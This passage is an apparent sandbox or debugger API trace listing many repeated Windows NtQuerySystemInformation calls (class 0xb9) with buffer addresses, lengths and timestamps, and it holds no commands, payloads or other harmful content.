(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef90, Length=0x38, ResultLength=0x0) [0226.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee10, Length=0x20, ResultLength=0x0) [0226.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x20, ResultLength=0x0) [0226.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x20, ResultLength=0x0) [0226.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x20, ResultLength=0x0) [0226.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef90, Length=0x38, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee10, Length=0x20, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feda0, Length=0x20, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feda0, Length=0x20, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff078, Length=0x58, ResultLength=0x0) [0226.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x38, ResultLength=0x0) [0226.647] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.650] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x28, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee00, Length=0x28, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x38, ResultLength=0x0) [0226.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x38, ResultLength=0x0) [0226.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee80, Length=0x28, ResultLength=0x0) [0226.656] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee80, Length=0x28, ResultLength=0x0) [0226.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x38, ResultLength=0x0) [0226.657] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x38, ResultLength=0x0) [0226.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.658] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecf0, Length=0x20, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feec0, Length=0x20, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.659] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x38, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x20, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x38, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x20, ResultLength=0x0) [0226.660] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef50, Length=0x38, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x20, ResultLength=0x0) [0226.661] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x20, ResultLength=0x0) [0226.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed70, Length=0x20, ResultLength=0x0) [0226.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff078, Length=0x58, ResultLength=0x0) [0226.662] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x58, ResultLength=0x0) [0226.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.663] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0226.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0226.665] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0226.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0226.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0226.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.666] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x28, ResultLength=0x0) [0226.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0226.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.667] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x28, ResultLength=0x0) [0226.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x28, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x58, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0226.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0226.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0226.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.677] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0226.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0226.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x28, ResultLength=0x0) [0226.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0226.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.678] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x28, ResultLength=0x0) [0226.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.682] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x28, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec20, Length=0x20, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feba0, Length=0x20, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feba0, Length=0x20, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feba0, Length=0x20, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.683] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.684] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x58, ResultLength=0x0) [0226.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.685] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0227.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0227.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0227.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0227.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0227.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x28, ResultLength=0x0) [0227.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0227.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.068] NtQuerySystemInformation 